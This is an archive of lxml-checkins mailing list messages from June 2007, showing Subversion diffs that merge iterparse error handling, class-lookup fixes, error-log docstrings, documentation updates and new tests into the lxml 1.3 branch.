cdef void _pushSaxStartEvent(xmlparser.xmlParserCtxt* c_ctxt, xmlNode* c_node): - cdef _IterparseResolverContext context - context = <_IterparseResolverContext>c_ctxt._private - context.startNode(c_node) + cdef _IterparseContext context + context = <_IterparseContext>c_ctxt._private + try: + context.startNode(c_node) + except: + if c_ctxt.errNo == xmlerror.XML_ERR_OK: + c_ctxt.errNo = xmlerror.XML_ERR_INTERNAL_ERROR + c_ctxt.disableSAX = 1 + context._store_raised() cdef void _pushSaxEndEvent(xmlparser.xmlParserCtxt* c_ctxt, xmlNode* c_node): - cdef _IterparseResolverContext context - context = <_IterparseResolverContext>c_ctxt._private - context.endNode(c_node) + cdef _IterparseContext context + context = <_IterparseContext>c_ctxt._private + try: + context.endNode(c_node) + except: + if c_ctxt.errNo == xmlerror.XML_ERR_OK: + c_ctxt.errNo = xmlerror.XML_ERR_INTERNAL_ERROR + c_ctxt.disableSAX = 1 + context._store_raised() cdef xmlparser.startElementNsSAX2Func _getOrigStart(xmlparser.xmlParserCtxt* c_ctxt): - return (<_IterparseResolverContext>c_ctxt._private)._origSaxStart + return (<_IterparseContext>c_ctxt._private)._origSaxStart cdef xmlparser.endElementNsSAX2Func _getOrigEnd(xmlparser.xmlParserCtxt* c_ctxt): - return (<_IterparseResolverContext>c_ctxt._private)._origSaxEnd + return (<_IterparseContext>c_ctxt._private)._origSaxEnd cdef void _saxStart(void* ctxt, char* localname, char* prefix, char* URI, int nb_namespaces, char** namespaces, @@ -230,7 +241,7 @@ def __init__(self, source, events=("end",), tag=None, attribute_defaults=False, dtd_validation=False, load_dtd=False, no_network=False, remove_blank_text=False): - cdef _IterparseResolverContext context + cdef _IterparseContext context cdef char* c_filename cdef int parse_options if not hasattr(source, 'read'): @@ -246,7 +257,7 @@ c_filename = NULL self._source = source - _BaseParser.__init__(self, _IterparseResolverContext) + _BaseParser.__init__(self, _IterparseContext) parse_options = _XML_DEFAULT_PARSE_OPTIONS if load_dtd: @@ -263,7 +274,7 @@ parse_options = parse_options | xmlparser.XML_PARSE_NOBLANKS self._parse_options = parse_options - context = <_IterparseResolverContext>self._context + context = <_IterparseContext>self._context context._setEventFilter(events, tag) context._wrapCallbacks(self._parser_ctxt.sax) xmlparser.xmlCtxtUseOptions(self._parser_ctxt, parse_options) @@ -274,12 +285,12 @@ return self def __next__(self): - cdef _IterparseResolverContext context + cdef _IterparseContext context cdef int error cdef char* c_filename if self._source is None: raise StopIteration - context = <_IterparseResolverContext>self._context + context = <_IterparseContext>self._context if python.PyList_GET_SIZE(context._events) > context._event_index: item = python.PyList_GET_ITEM(context._events, context._event_index) python.Py_INCREF(item) # 'borrowed reference' from PyList_GET_ITEM @@ -291,7 +302,6 @@ while python.PyList_GET_SIZE(context._events) == 0 and error == 0: data = self._source.read(__ITERPARSE_CHUNK_SIZE) if not python.PyString_Check(data): - #xmlparser.xmlParseChunk(self._parser_ctxt, NULL, 0, 1) self._source = None raise TypeError, "reading file objects must return plain strings" elif data: @@ -307,6 +317,7 @@ _raiseParseError(self._parser_ctxt, self._filename) if python.PyList_GET_SIZE(context._events) == 0: self.root = context._root + self._source = None raise StopIteration context._event_index = 1 @@ -316,8 +327,8 @@ cdef class iterwalk: - """A tree walker that generates ``iterparse()`` events from an existing - tree as if it was parsing XML data. + """A tree walker that generates events from an existing tree as if it was + parsing XML data with ``iterparse()``. """ cdef object _node_stack cdef object _pop_node Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py Tue Jun 12 19:11:47 2007 @@ -290,6 +290,27 @@ self.assertEquals(None, root.get('three')) self.assertEquals('foo', root.get('three', 'foo')) + def test_attrib_clear(self): + XML = self.etree.XML + + root = XML('') + self.assertEquals('One', root.get('one')) + self.assertEquals('Two', root.get('two')) + root.attrib.clear() + self.assertEquals(None, root.get('one')) + self.assertEquals(None, root.get('two')) + + def test_attrib_set_clear(self): + Element = self.etree.Element + + root = Element("root", one="One") + root.set("two", "Two") + self.assertEquals('One', root.get('one')) + self.assertEquals('Two', root.get('two')) + root.attrib.clear() + self.assertEquals(None, root.get('one')) + self.assertEquals(None, root.get('two')) + def test_attribute_update_dict(self): XML = self.etree.XML Modified: lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd Tue Jun 12 19:11:47 2007 @@ -52,6 +52,8 @@ int wellFormed int recovery int options + int disableSAX + int errNo xmlError lastError xmlNode* node xmlSAXHandler* sax From scoder at codespeak.net Tue Jun 12 19:18:17 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:18:17 +0200 (CEST) Subject: [Lxml-checkins] r44189 - in lxml/branch/lxml-1.3: doc src/lxml src/lxml/tests Message-ID: <20070612171817.A535381A6@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:18:17 2007 New Revision: 44189 Modified: lxml/branch/lxml-1.3/doc/api.txt lxml/branch/lxml-1.3/doc/capi.txt lxml/branch/lxml-1.3/src/lxml/classlookup.pxi lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd lxml/branch/lxml-1.3/src/lxml/tests/test_classlookup.py lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi Log: merged in doc updates and revs 43349:43352 from trunk Modified: lxml/branch/lxml-1.3/doc/api.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/api.txt (original) +++ lxml/branch/lxml-1.3/doc/api.txt Tue Jun 12 19:18:17 2007 @@ -31,9 +31,10 @@ 3 Trees and Documents 4 Iteration 5 Error handling on exceptions - 6 Serialisation - 7 XInclude and ElementInclude - 8 write_c14n on ElementTree + 6 Error logging + 7 Serialisation + 8 XInclude and ElementInclude + 9 write_c14n on ElementTree lxml.etree @@ -188,29 +189,46 @@ ---------------------------- Libxml2 provides error messages for failures, be it during parsing, XPath -evaluation or schema validation. Whenever an exception is raised, you can -retrieve the errors that occured and "might have" lead to the problem:: +evaluation or schema validation. The preferred way of accessing them is +through the local ``error_log`` property of the respective evaluator or +transformer object. See their documentation for details. + +However, lxml also keeps a global error log of all errors that occurred at the +application level. Whenever an exception is raised, you can retrieve the +errors that occured and "might have" lead to the problem from the error log +copy attached to the exception:: >>> etree.clearErrorLog() - >>> broken_xml = '' + >>> broken_xml = ''' + ... + ... + ... + ... ''' >>> try: ... etree.parse(StringIO(broken_xml)) ... except etree.XMLSyntaxError, e: ... pass # just put the exception into e - >>> log = e.error_log.filter_levels(etree.ErrorLevels.FATAL) + +Once you have caught this exception, you can access its ``error_log`` property +to retrieve the log entries or filter them by a specific type, error domain or +error level:: + + >>> log = e.error_log.filter_from_level(etree.ErrorLevels.FATAL) >>> print log - :1:FATAL:PARSER:ERR_TAG_NOT_FINISHED: Premature end of data in tag a line 1 + :4:FATAL:PARSER:ERR_TAG_NAME_MISMATCH: Opening and ending tag mismatch: a line 3 and root + :5:FATAL:PARSER:ERR_TAG_NOT_FINISHED: Premature end of data in tag root line 2 This might look a little cryptic at first, but it is the information that libxml2 gives you. At least the message at the end should give you a hint -what went wrong and you can see that the fatal error (FATAL) happened during -parsing (PARSER) line 1 of a string (, or filename if available). -Here, PARSER is the so-called error domain, see lxml.etree.ErrorDomains for -that. You can get it from a log entry like this:: +what went wrong and you can see that the fatal errors (FATAL) happened during +parsing (PARSER) lines 4 and 5 of a string (, or the filename if +available). Here, PARSER is the so-called error domain, see +``lxml.etree.ErrorDomains`` for that. You can get it from a log entry like +this:: >>> entry = log[0] >>> print entry.domain_name, entry.type_name, entry.filename - PARSER ERR_TAG_NOT_FINISHED + PARSER ERR_TAG_NAME_MISMATCH There is also a convenience attribute ``last_error`` that returns the last error or fatal error that occurred:: @@ -219,13 +237,16 @@ >>> print entry.domain_name, entry.type_name, entry.filename PARSER ERR_TAG_NOT_FINISHED -Alternatively, lxml.etree supports logging libxml2 messages to the Python -stdlib logging module. This is done through the ``etree.PyErrorLog`` class. -It disables the error reporting from exceptions and forwards log messages to a -Python logger. To use it, see the descriptions of the function -``etree.useGlobalPythonLog`` and the class ``etree.PyErrorLog`` for help. -Note that this does not affect the local error logs of XSLT, XMLSchema, -etc. which are described in their respective sections below. + +Error logging +------------- + +lxml.etree supports logging libxml2 messages to the Python stdlib logging +module. This is done through the ``etree.PyErrorLog`` class. It disables the +error reporting from exceptions and forwards log messages to a Python logger. +To use it, see the descriptions of the function ``etree.useGlobalPythonLog`` +and the class ``etree.PyErrorLog`` for help. Note that this does not affect +the local error logs of XSLT, XMLSchema, etc. Serialisation Modified: lxml/branch/lxml-1.3/doc/capi.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/capi.txt (original) +++ lxml/branch/lxml-1.3/doc/capi.txt Tue Jun 12 19:18:17 2007 @@ -9,7 +9,7 @@ The API is described in the file `etreepublic.pxd`_, which is directly c-importable by Pyrex modules. -.. _`etreepublic.pxd`: http://codespeak.net/svn/lxml/branch/capi/src/lxml/etreepublic.pxd +.. _`etreepublic.pxd`: http://codespeak.net/svn/lxml/trunk/src/lxml/etreepublic.pxd .. contents:: .. @@ -23,6 +23,8 @@ This is the easiest way of extending lxml at the C level. A Pyrex module should start like this:: + # My Pyrex extension + # import the public functions and classes of lxml.etree cimport etreepublic as cetree @@ -47,7 +49,8 @@ def setValue(self, myval): self.set("my_attribute", myval) - etree.setDefaultElementClass(NewElementClass) + etree.setElementClassLookup( + DefaultElementClassLookup(element=NewElementClass)) Writing external modules in C Modified: lxml/branch/lxml-1.3/src/lxml/classlookup.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/classlookup.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/classlookup.pxi Tue Jun 12 19:18:17 2007 @@ -79,6 +79,9 @@ cdef class ElementDefaultClassLookup(ElementClassLookup): """Element class lookup scheme that always returns the default Element class. + + The keyword arguments ``element``, ``comment`` and ``pi`` accept the + respective Element classes. """ cdef readonly object element_class cdef readonly object comment_class @@ -86,21 +89,21 @@ def __init__(self, element=None, comment=None, pi=None): self._lookup_function = _lookupDefaultElementClass if element is None: - self.element_class = _Element + self.element_class = None elif issubclass(element, ElementBase): self.element_class = element else: raise TypeError, "element class must be subclass of ElementBase" if comment is None: - self.comment_class = _Comment + self.comment_class = None elif issubclass(comment, CommentBase): self.comment_class = comment else: raise TypeError, "comment class must be subclass of CommentBase" if pi is None: - self.pi_class = _ProcessingInstruction + self.pi_class = None elif issubclass(pi, PIBase): self.pi_class = pi else: @@ -109,17 +112,23 @@ cdef object _lookupDefaultElementClass(state, _Document _doc, xmlNode* c_node): "Trivial class lookup function that always returns the default class." if c_node.type == tree.XML_ELEMENT_NODE: - if state is None: + if state is not None: + cls = (state).element_class + if cls is None: return _Element else: - return (state).element_class + return cls elif c_node.type == tree.XML_COMMENT_NODE: - if state is None: + if state is not None: + cls = (state).comment_class + if cls is None: return _Comment else: - return (state).comment_class + return cls elif c_node.type == tree.XML_PI_NODE: - if state is None: + if state is not None: + cls = (state).pi_class + if cls is None: # special case XSLT-PI if c_node.name is not NULL and c_node.content is not NULL: if cstd.strcmp(c_node.name, "xml-stylesheet") == 0: @@ -128,7 +137,7 @@ return _XSLTProcessingInstruction return _ProcessingInstruction else: - return (state).pi_class + return cls else: assert 0, "Unknown node type: %s" % c_node.type @@ -145,9 +154,9 @@ dictionary. Arguments: - * attribute name ('{ns}name' style string) - * class mapping (Python dict mapping attribute values to Element classes) - * fallback (optional fallback lookup mechanism) + * attribute name - '{ns}name' style string + * class mapping - Python dict mapping attribute values to Element classes + * fallback - optional fallback lookup mechanism A None key in the class mapping will be checked if the attribute is missing. @@ -194,10 +203,9 @@ cdef object _parser_class_lookup(state, _Document doc, xmlNode* c_node): cdef FallbackElementClassLookup lookup lookup = state - if c_node.type == tree.XML_ELEMENT_NODE: - if doc._parser._class_lookup is not None: - return doc._parser._class_lookup._lookup_function( - doc._parser._class_lookup, doc, c_node) + if doc._parser._class_lookup is not None: + return doc._parser._class_lookup._lookup_function( + doc._parser._class_lookup, doc, c_node) return lookup._callFallback(doc, c_node) Modified: lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd Tue Jun 12 19:18:17 2007 @@ -36,7 +36,7 @@ cdef class lxml.etree._ElementTree [ object LxmlElementTree ]: cdef _Document _doc - cdef _Element _element + cdef _Element _context_node cdef class lxml.etree.ElementClassLookup [ object LxmlElementClassLookup ]: cdef object (*_lookup_function)(object, _Document, tree.xmlNode*) @@ -82,7 +82,7 @@ cdef object lookupNamespaceElementClass(_1, _Document _2, tree.xmlNode* c_node) - # call the fallback lookup function of an FallbackElementClassLookup + # call the fallback lookup function of a FallbackElementClassLookup cdef object callLookupFallback(FallbackElementClassLookup lookup, _Document doc, tree.xmlNode* c_node) Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_classlookup.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_classlookup.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_classlookup.py Tue Jun 12 19:18:17 2007 @@ -51,6 +51,31 @@ def test_default_class_lookup(self): class TestElement(etree.ElementBase): + FIND_ME = "default element" + class TestComment(etree.CommentBase): + FIND_ME = "default comment" + class TestPI(etree.PIBase): + FIND_ME = "default pi" + + parser = etree.XMLParser() + + lookup = etree.ElementDefaultClassLookup( + element=TestElement, comment=TestComment, pi=TestPI) + parser.setElementClassLookup(lookup) + + root = etree.XML(""" + + + + + """, parser) + + self.assertEquals("default element", root.FIND_ME) + self.assertEquals("default pi", root[0].FIND_ME) + self.assertEquals("default comment", root[1].FIND_ME) + + def test_default_class_lookup_is_not_nslookup(self): + class TestElement(etree.ElementBase): FIND_ME = "namespace class" ns = etree.Namespace("myNS") Modified: lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi Tue Jun 12 19:18:17 2007 @@ -128,6 +128,9 @@ self._entries = entries def copy(self): + """Creates a shallow copy of this error log. Reuses the list of + entries. + """ return _ListErrorLog(self._entries, self.last_error) def __iter__(self): @@ -146,6 +149,9 @@ return len(self._entries) def filter_domains(self, domains): + """Filter the errors by the given domains and return a new error log + containing the matches. + """ cdef _LogEntry entry filtered = [] if not python.PySequence_Check(domains): @@ -156,6 +162,9 @@ return _ListErrorLog(filtered) def filter_types(self, types): + """Filter the errors by the given types and return a new error log + containing the matches. + """ cdef _LogEntry entry if not python.PySequence_Check(types): types = (types,) @@ -166,8 +175,9 @@ return _ListErrorLog(filtered) def filter_levels(self, levels): - """Return a log with all messages of the requested level(s). Takes a - single log level or a sequence.""" + """Filter the errors by the given error levels and return a new error + log containing the matches. + """ cdef _LogEntry entry if not python.PySequence_Check(levels): levels = (levels,) @@ -213,6 +223,8 @@ del self._entries[:] def copy(self): + """Creates a shallow copy of this error log and the list of entries. + """ return _ListErrorLog(self._entries[:], self.last_error) def __iter__(self): @@ -260,7 +272,8 @@ object and calls ``self.log(log_entry, format_string, arg1, arg2, ...)`` with appropriate data. """ - cdef public object level_map + cdef readonly object level_map + cdef object _map_level cdef object _log def __init__(self, logger_name=None): _BaseErrorLog.__init__(self) @@ -270,6 +283,7 @@ ErrorLevels.ERROR : logging.ERROR, ErrorLevels.FATAL : logging.CRITICAL } + self._map_level = self.level_map.get if logger_name: logger = logging.getLogger(logger_name) else: @@ -277,11 +291,13 @@ self._log = logger.log def copy(self): + """Dummy method that returns an empty error log. + """ return _ListErrorLog([]) def log(self, entry, message_format_string, *args): self._log( - self.level_map.get(entry.level, 0), + self._map_level(entry.level, 0), message_format_string, *args ) @@ -300,9 +316,8 @@ """Replace the global error log by an etree.PyErrorLog that uses the standard Python logging package. - Note that this slows down processing and disables access to the global - error log from exceptions. Parsers, XSLT etc. will continue to provide - their normal local error log. + Note that this disables access to the global error log from exceptions. + Parsers, XSLT etc. will continue to provide their normal local error log. """ global __GLOBAL_ERROR_LOG __GLOBAL_ERROR_LOG = log @@ -378,6 +393,11 @@ c_error.domain = xmlerror.XML_FROM_XSLT c_error.code = xmlerror.XML_ERR_OK # what else? c_error.level = xmlerror.XML_ERR_ERROR # what else? + c_error.str1 = NULL + c_error.str2 = NULL + c_error.str3 = NULL + c_error.int1 = 0 + c_error.int2 = 0 _forwardError(c_log_handler, &c_error) From scoder at codespeak.net Tue Jun 12 19:20:45 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:20:45 +0200 (CEST) Subject: [Lxml-checkins] r44191 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070612172045.4D19C8198@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:20:44 2007 New Revision: 44191 Modified: lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi Log: fix for last commit Modified: lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi Tue Jun 12 19:20:44 2007 @@ -393,11 +393,6 @@ c_error.domain = xmlerror.XML_FROM_XSLT c_error.code = xmlerror.XML_ERR_OK # what else? c_error.level = xmlerror.XML_ERR_ERROR # what else? - c_error.str1 = NULL - c_error.str2 = NULL - c_error.str3 = NULL - c_error.int1 = 0 - c_error.int2 = 0 _forwardError(c_log_handler, &c_error) From scoder at codespeak.net Tue Jun 12 19:25:31 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:25:31 +0200 (CEST) Subject: [Lxml-checkins] r44192 - in lxml/branch/lxml-1.3/doc: . html Message-ID: <20070612172531.AFF8F8198@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:25:31 2007 New Revision: 44192 Modified: lxml/branch/lxml-1.3/doc/api.txt lxml/branch/lxml-1.3/doc/html/style.css Log: doc updates from trunk Modified: lxml/branch/lxml-1.3/doc/api.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/api.txt (original) +++ lxml/branch/lxml-1.3/doc/api.txt Tue Jun 12 19:25:31 2007 @@ -1,11 +1,11 @@ -===================== -APIs specific to lxml -===================== - -lxml tries to follow established APIs wherever possible. Sometimes, however, -the need to expose a feature in an easy way led to the invention of a new API. -This page describes the major differences and a few additions to the main -ElementTree API. +=========================== +APIs specific to lxml.etree +=========================== + +lxml.etree tries to follow established APIs wherever possible. Sometimes, +however, the need to expose a feature in an easy way led to the invention of a +new API. This page describes the major differences and a few additions to the +main ElementTree API. Separate pages describe the support for `parsing XML`_, executing `XPath and XSLT`_, `validating XML`_ and interfacing with other XML tools through the Modified: lxml/branch/lxml-1.3/doc/html/style.css ============================================================================== --- lxml/branch/lxml-1.3/doc/html/style.css (original) +++ lxml/branch/lxml-1.3/doc/html/style.css Tue Jun 12 19:25:31 2007 @@ -41,13 +41,13 @@ /*** TOC ***/ -div.contents.topic > ul { +div.contents.topic ul { margin-top: 0px; } -div.contents.topic > ul > li { +div.contents.topic ul > li { text-decoration: none; - line-height: 1.1em; + line-height: 1.2em; } div.contents.topic > p > a { From scoder at codespeak.net Tue Jun 12 19:26:48 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:26:48 +0200 (CEST) Subject: [Lxml-checkins] r44193 - in lxml/branch/lxml-1.3: . src/lxml Message-ID: <20070612172648.D49188198@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:26:48 2007 New Revision: 44193 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/xslt.pxi Log: merged in bug fix from trunk rev 43574 Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 19:26:48 2007 @@ -22,6 +22,8 @@ Bugs fixed ---------- +* XSLT parsing failed to pass resolver context on to imported documents + * More ET compatible behaviour when writing out XML declarations or not * ``Element.attrib`` was missing ``clear()`` method Modified: lxml/branch/lxml-1.3/src/lxml/xslt.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/xslt.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/xslt.pxi Tue Jun 12 19:26:48 2007 @@ -131,6 +131,8 @@ c_doc = _xslt_resolve_stylesheet(c_uri, c_pcontext) if c_doc is not NULL: python.PyGILState_Release(gil_state) + if c_type == xslt.XSLT_LOAD_STYLESHEET: + c_doc._private = c_pcontext return c_doc c_doc = _xslt_resolve_from_python(c_uri, c_pcontext, parse_options, &error) @@ -141,6 +143,8 @@ _xslt_store_resolver_exception(c_uri, c_pcontext, c_type) python.PyGILState_Release(gil_state) + if c_doc is not NULL and c_type == xslt.XSLT_LOAD_STYLESHEET: + c_doc._private = c_pcontext return c_doc cdef xslt.xsltDocLoaderFunc XSLT_DOC_DEFAULT_LOADER From scoder at codespeak.net Tue Jun 12 19:31:03 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:31:03 +0200 (CEST) Subject: [Lxml-checkins] r44195 - lxml/trunk/src/lxml Message-ID: <20070612173103.F371B81A2@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:31:03 2007 New Revision: 44195 Modified: lxml/trunk/src/lxml/proxy.pxi Log: reverted wrong change from rev 43693 Modified: lxml/trunk/src/lxml/proxy.pxi ============================================================================== --- lxml/trunk/src/lxml/proxy.pxi (original) +++ lxml/trunk/src/lxml/proxy.pxi Tue Jun 12 19:31:03 2007 @@ -56,6 +56,7 @@ c_new_root = tree.xmlDocCopyNode(c_node, c_doc, 2) # non recursive! tree.xmlDocSetRootElement(c_doc, c_new_root) _copyParentNamespaces(c_node, c_new_root) + _copyParentNamespaces(c_node, c_root) c_new_root.children = c_node.children c_new_root.last = c_node.last From scoder at codespeak.net Tue Jun 12 19:32:03 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:32:03 +0200 (CEST) Subject: [Lxml-checkins] r44196 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070612173203.9EB4081A2@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:32:03 2007 New Revision: 44196 Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx Log: merged in rev 43695 from trunk Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 19:32:03 2007 @@ -1220,6 +1220,8 @@ if self._context_node is not None and \ self._context_node._doc is not None: return self._context_node._doc._parser + if self._doc is not None: + return self._doc._parser return None def write(self, file, encoding=None, @@ -1299,7 +1301,6 @@ path = "." + path return root.findall(path) - # extensions to ElementTree API def xpath(self, _path, namespaces=None, extensions=None, **_variables): """XPath evaluate in context of document. @@ -1376,7 +1377,8 @@ There is support for loading files through the file system, HTTP and FTP. - Note that XInclude does not support custom resolvers in Python space. + Note that XInclude does not support custom resolvers in Python space + due to restrictions of libxml2 <= 2.6.28. """ cdef python.PyThreadState* state cdef int result From scoder at codespeak.net Tue Jun 12 19:39:33 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:39:33 +0200 (CEST) Subject: [Lxml-checkins] r44197 - in lxml/branch/lxml-1.3: . src/lxml Message-ID: <20070612173933.E84C981A1@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:39:33 2007 New Revision: 44197 Modified: lxml/branch/lxml-1.3/TODO.txt lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/versioninfo.py Log: merged in revs 43837:43853 from trunk Modified: lxml/branch/lxml-1.3/TODO.txt ============================================================================== --- lxml/branch/lxml-1.3/TODO.txt (original) +++ lxml/branch/lxml-1.3/TODO.txt Tue Jun 12 19:39:33 2007 @@ -17,12 +17,6 @@ * more testing on multi-threading -ElementTree ------------ - -* _setroot(), even though this is not strictly a public method. - - QName ----- Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 19:39:33 2007 @@ -1190,6 +1190,14 @@ self._doc = None return self._context_node + def _setroot(self, _Element root not None): + """Relocate the ElementTree to a new root node. + """ + if root._c_node.type != tree.XML_ELEMENT_NODE: + raise TypeError, "Only elements can be the root of an ElementTree" + self._context_node = root + self._doc = None + def getroot(self): """Gets the root element for this tree. """ Modified: lxml/branch/lxml-1.3/versioninfo.py ============================================================================== --- lxml/branch/lxml-1.3/versioninfo.py (original) +++ lxml/branch/lxml-1.3/versioninfo.py Tue Jun 12 19:39:33 2007 @@ -38,7 +38,9 @@ elif data.startswith(' Author: scoder Date: Tue Jun 12 19:41:50 2007 New Revision: 44198 Modified: lxml/branch/lxml-1.3/doc/FAQ.txt lxml/branch/lxml-1.3/doc/build.txt Log: doc updates from trunk Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Tue Jun 12 19:41:50 2007 @@ -253,7 +253,12 @@ b) If you are using threads, please see the following section to check if you touch on one of the potential pitfalls. -c) Otherwise, we would really like to hear about it. Please report it to the +c) Try to reproduce the problem with the latest versions of libxml2 and + libxslt. From time to time, bugs and race conditions are found in these + libraries, so a more recent version might already contain a fix for your + problem. + +d) Otherwise, we would really like to hear about it. Please report it to the `mailing list`_ so that we can fix it. It is very helpful in this case if you can come up with a short code snippet that demonstrates your problem. Please also report the version of lxml, libxml2 and libxslt that you are Modified: lxml/branch/lxml-1.3/doc/build.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/build.txt (original) +++ lxml/branch/lxml-1.3/doc/build.txt Tue Jun 12 19:41:50 2007 @@ -44,7 +44,7 @@ http://codespeak.net/svn/lxml/pyrex/ A subversion checkout of lxml will automatically retrieve the latest Pyrex - as external project source (``svn:externals``). Look out for the ``Pyrex`` + as external project source (``svn:externals``). Look for the ``Pyrex`` directory in the source tree. Since version 1.1.2, the lxml source distribution also includes this Pyrex @@ -182,6 +182,26 @@ lxml maintainer. +Providing newer library versions on Mac-OS X +-------------------------------------------- + +The Unix environment in Mac-OS X makes it relatively easy to install +Unix/Linux style package management tools and new software. However, it seems +to be hard to get libraries set up for exclusive usage that Mac-OS X ships in +an older version. The result can be segfaults on this platform that are hard +to track down. + +To make sure the newer libxml2 and libxslt versions are used (e.g. under +fink), you should add the directory where you installed the libraries to the +``DYLD_LIBRARY_PATH`` environment variable. This seems to fix a lot of +problems for users. + +Alternatively, you can build lxml statically. A way to do this on MS Windows +is described in the next section, but it should be easy to adapt it for +Mac-OS. That way, you can always be sure you use the versions you compiled +lxml with, regardless of the runtime environement. + + Static linking on Windows ------------------------- From scoder at codespeak.net Tue Jun 12 19:46:15 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:46:15 +0200 (CEST) Subject: [Lxml-checkins] r44199 - in lxml/branch/lxml-1.3: . src/lxml src/lxml/tests Message-ID: <20070612174615.985E081A5@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:46:15 2007 New Revision: 44199 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py lxml/branch/lxml-1.3/src/lxml/tree.pxd Log: merged in trunk fixes from revs 44117 and 44165 Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 19:46:15 2007 @@ -22,6 +22,12 @@ Bugs fixed ---------- +* Replacing the children slice of an Element would cut off the tails of the + original children + +* API functions now check incoming strings for XML conformity. Zero bytes or + low ASCII characters are no longer accepted. + * XSLT parsing failed to pass resolver context on to imported documents * More ET compatible behaviour when writing out XML declarations or not Modified: lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi Tue Jun 12 19:46:15 2007 @@ -462,7 +462,10 @@ cdef void _removeNode(xmlNode* c_node): """Unlink and free a node and subnodes if possible. """ + cdef xmlNode* c_next + c_next = c_node.next tree.xmlUnlinkNode(c_node) + _moveTail(c_next, c_node) attemptDeallocation(c_node) cdef void _moveTail(xmlNode* c_tail, xmlNode* c_target): @@ -503,8 +506,8 @@ while c_node is not NULL and c < stop: c_next = c_node.next if _isElement(c_node): - _removeText(c_node.next) - c_next = c_node.next + while c_next is not NULL and not _isElement(c_next): + c_next = c_next.next _removeNode(c_node) c = c + 1 c_node = c_next @@ -572,16 +575,20 @@ cdef char* s cdef char* c_end cdef char c + cdef int is_non_ascii s = _cstr(pystring) c_end = s + python.PyString_GET_SIZE(pystring) + is_non_ascii = 0 while s < c_end: c = s[0] + if c & 0x80: + is_non_ascii = 1 if c == c'\0': return -1 # invalid! - if c & 0x80: - return 1 # non-ASCII + if is_non_ascii == 0 and not tree.xmlIsChar_ch(c): + return -1 # 